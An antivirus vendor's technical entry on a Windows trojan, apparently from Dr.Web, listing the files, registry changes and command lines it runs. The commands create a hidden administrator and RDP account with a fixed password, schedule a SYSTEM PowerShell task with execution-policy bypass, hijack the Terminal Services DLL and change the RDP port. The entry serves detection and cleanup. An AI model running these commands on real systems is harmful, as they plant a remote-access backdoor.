Trojan.StartPage1.58198

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

<SYSTEM32>\tasks\41030

Creates the following services

[<HKLM>\system\currentcontrolset\services\TermService\parameters] 'ServiceDLL' = '%WINDIR%\help\tmp5211.dat'
[<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'

Modifies file system

Creates the following files

%TEMP%\nspebde.tmp\blowfish.dll
C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\fax recipient.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\desktop (create shortcut).desklink
C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\compressed (zipped) folder.zfsendtotarget
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\narrator.lnk
C:\users\supportaccount\appdata\roaming\microsoft\internet explorer\quick launch\window switcher.lnk
C:\users\supportaccount\appdata\roaming\microsoft\internet explorer\quick launch\shows desktop.lnk
<SYSTEM32>\microsoft\protect\s-1-5-20\preferred
C:\users\supportaccount\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\run.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\windows explorer.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\command prompt.lnk
C:\users\supportaccount\ntuser.ini
C:\users\supportaccount\appdata\local\microsoft\windows\usrclass.dat.log1
C:\users\supportaccount\appdata\local\microsoft\windows\usrclass.dat
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\sendto\mail recipient.mapimail
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\ease of access.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\magnify.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\on-screen keyboard.lnk
%TEMP%\vbypncxtbhmod.ps1
%TEMP%\nspebde.tmp\system.dll
%WINDIR%\help\tmp5211.dat
%WINDIR%\help\tmp5212.dat
%WINDIR%\help\tmp5213.dat
<SYSTEM32>\rfxvmt.dll
%WINDIR%\temp\usrnm.txt
C:\users\supportaccount\ntuser.dat.log1
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\notepad.lnk
<SYSTEM32>\microsoft\protect\s-1-5-20\b750b703-a91c-42a7-9992-67f5e4a8b479
C:\users\supportaccount\ntuser.dat
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\maintenance\help.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\maintenance\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\private character editor.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\desktop.ini
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\computer.lnk
C:\users\supportaccount\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\control panel.lnk
%TEMP%\chadshfsd323.txt
%PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
C:\users\supportaccount\ntuser.pol

Sets the 'hidden' attribute to the following files

C:\users\supportaccount\ntuser.dat
C:\users\supportaccount\appdata\local\microsoft\windows\usrclass.dat

Deletes the following files

%TEMP%\nspebde.tmp\blowfish.dll
%TEMP%\nspebde.tmp\system.dll
%TEMP%\chadshfsd323.txt

Deletes itself.

Network activity

UDP

DNS ASK af####daslfo3d3.xyz

Miscellaneous

Searches for the following windows

ClassName: 'CicLoaderWndClass' WindowName: ''

Creates and executes the following

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -f %TEMP%\VBYPNCXTBHmod.ps1
'<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\VBYPNCXTBHmod.ps1' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount asfggees /del' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj /add' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" supportaccount /ADD' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" supportaccount /ADD' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj' (with hidden window)
'<SYSTEM32>\cmd.exe' /C schtasks /create /tn 41030 /tr "powershell -nop -ep bypass -f %WINDIR%\help\19196.ps1" /ru system /sc hourly /mo 1' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\VBYPNCXTBHmod.ps1
'<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" supportaccount /ADD
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD
'<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD
'<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" cvwvjaup$ /ADD
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" supportaccount /ADD
'<SYSTEM32>\net.exe' LOCALGROUP "Administrators" supportaccount /ADD
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" supportaccount /ADD
'<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" supportaccount /ADD
'<SYSTEM32>\net1.exe' LOCALGROUP "Administrators" supportaccount /ADD
'<SYSTEM32>\net1.exe' user supportaccount GiFUmPnj
'<SYSTEM32>\cmd.exe' /C schtasks /create /tn 41030 /tr "powershell -nop -ep bypass -f %WINDIR%\help\19196.ps1" /ru system /sc hourly /mo 1
'<SYSTEM32>\schtasks.exe' /create /tn 41030 /tr "powershell -nop -ep bypass -f %WINDIR%\help\19196.ps1" /ru system /sc hourly /mo 1
'<SYSTEM32>\smss.exe' 00000000 0000003c
'<SYSTEM32>\csrss.exe' ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitializa...
'<SYSTEM32>\winlogon.exe'
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj
'<SYSTEM32>\net.exe' user supportaccount GiFUmPnj
'<SYSTEM32>\cmd.exe' /c del %temp%\*.txt /f
'<SYSTEM32>\cmd.exe' /c del %temp%\*.ps1 /f
'<SYSTEM32>\net1.exe' user supportaccount GiFUmPnj /add
'<SYSTEM32>\icacls.exe' rfxvmt.dll /inheritance:d
'<SYSTEM32>\icacls.exe' rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /remove BUILTIN\Administrators
'<SYSTEM32>\icacls.exe' rfxvmt.dll /grant BUILTIN\Administrators:RX
'<SYSTEM32>\takeown.exe' /A /F rfxvmt.dll
'<SYSTEM32>\reg.exe' ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
'<SYSTEM32>\net.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
'<SYSTEM32>\net1.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount asfggees /del
'<SYSTEM32>\net.exe' user supportaccount asfggees /del
'<SYSTEM32>\net1.exe' user supportaccount asfggees /del
'<SYSTEM32>\cmd.exe' /C net.exe user supportaccount GiFUmPnj /add
'<SYSTEM32>\net.exe' user supportaccount GiFUmPnj /add
'<SYSTEM32>\reg.exe' add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %WINDIR%\help\tmp5211.dat /f
'<SYSTEM32>\gpscript.exe' /RefreshSystemParam
'<SYSTEM32>\rdpclip.exe'

Attempts to shut down the Windows operating system.

Your browser is obsolete!

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations

Free trial

Doctor Web in social networks

For Telegram

Other Dr.Web resources